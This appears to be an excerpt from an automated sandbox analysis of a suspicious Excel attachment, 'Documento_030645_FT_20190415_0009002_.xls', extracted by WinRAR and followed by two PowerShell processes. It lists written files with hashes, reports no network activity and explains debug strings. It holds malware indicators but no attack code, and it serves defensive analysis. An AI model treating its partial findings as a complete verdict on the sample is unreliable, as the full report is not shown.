| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2340 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 16d0fd6e07266b2c15a9d7bc6623f506 | 833367dc50386d139010182cede41b4d055f8d463626ec4005652528b3e0871b |
| 2340 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF119632.TMP | binary | 16d0fd6e07266b2c15a9d7bc6623f506 | 833367dc50386d139010182cede41b4d055f8d463626ec4005652528b3e0871b |
| 2340 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FSNCE7I9DHG9I0S5A06F.temp | –– | –– | –– |
| 1348 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1191ae.TMP | binary | 16d0fd6e07266b2c15a9d7bc6623f506 | 833367dc50386d139010182cede41b4d055f8d463626ec4005652528b3e0871b |
| 1348 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 16d0fd6e07266b2c15a9d7bc6623f506 | 833367dc50386d139010182cede41b4d055f8d463626ec4005652528b3e0871b |
| 1348 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6J5VKHE74T6XU1MI03TV.temp | –– | –– | –– |
| 1092 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Documento_030645_FT_20190415_0009002_.xls.LNK | lnk | 152c2b8e0467221529e5036b3ad70371 | 7ee1c4e4cadb4dc02b8ddfccd00c15f4816ca3b006f77d46d2d17d92022fb319 |
| 1092 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 566ca839531d7e37c18858997563a172 | 94784b95a77f7f359ca51161591382b57458fa08ba6113d0c459a6fc2153e9fb |
| 1092 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR88C5.tmp.cvr | –– | –– | –– |
| 3044 | WinRAR.exe | C:\Users\admin\Desktop\Documento_030645_FT_20190415_0009002_.xls | document | bdca0278481f87df29f57f9a59bee23c | 9dc2a7a5a2f6a93ccedd912ce3a529d7c42155396a5610536ecf107df15ddab1 |

Both powershell.exe instances (PIDs 1348 and 2340) write the same customDestinations-ms jump-list content (identical MD5/SHA256), i.e. shell bookkeeping for the console; the only payload-relevant file is the .xls that WinRAR.exe (PID 3044) extracted to the Desktop, and no executable was dropped.

Find more information about the static content, and download it, in the full report.

Network activity

HTTP(S) requests: 0
TCP/UDP connections: 0
DNS requests: 0
Threats: 0

No network activity.

Debug output strings

| Process | Message |
|---|---|
| powershell.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
| powershell.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |

-2147024774 is HRESULT 0x8007007A (ERROR_INSUFFICIENT_BUFFER) raised inside the side-by-side isolation code; one line per PowerShell process (1348 and 2340), and not an indicator by itself.